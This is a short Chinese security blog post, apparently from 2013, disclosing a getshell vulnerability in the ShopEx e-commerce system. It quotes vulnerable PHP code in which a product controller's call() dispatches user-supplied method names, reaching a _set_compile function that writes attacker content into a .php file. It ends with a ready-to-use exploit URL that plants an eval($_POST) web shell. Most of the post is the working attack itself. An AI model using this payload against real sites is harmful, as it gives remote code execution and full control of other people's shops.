shopex Getshell

博主有话说:这个漏洞,需要站点开启伪静态,不然也是鸡肋的。

ctl.product.php

	class ctl_product extends shopPage{

	    var $_call = 'call';
	    var $type = 'goods';
	    var $seoTag = array

('shopname','brand','goods_name','goods_cat','goods_intro','goods_brief','brand_kw','goods_kw','goods_pr

ice','update_time','goods_bn');
	    function ctl_product(){
	        parent::shopPage();
	        $this->title    = $this->system->getConf('site.goods_title');
	        $this->keywords = $this->system->getConf('site.goods_meta_key_words');
	        $this->desc     = $this->system->getConf('site.goods_meta_desc');
	    }
	    function call(){
	        $args = func_get_args();
	        $action = array_shift($args);
	//echo $args."||".var_dump($this);
	//echo 1111;
	var_dump($args);
	var_dump(get_class_methods($this));
	        if(method_exists($this,$action)){
	            return call_user_func_array(array(&$this,$action),$args);//可以执行一些 系统自带的函

数 我们找下有没可利用的
	        }

	pageFactory.php
	 public function _set_compile( $key, &$content )//就调用这个函数 可以直接写出shell
	    {
	        if ( !$this->force_compile )
	        {
	            file_put_contents( $this->compile_dir.$key.".php", $content );
	        }
	    }
http://xx.com/product-12-[/url]<script%20language="php">eval($_POST)%3B-_set_compile.html

20130904170348
By:Cond0r

本文固定链接: https://www.unhonker.com/bug/1393.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2013年09月04日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: shopex Getshell | 90' s Blog|关注网络信息安全
关键字:

shopex Getshell:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!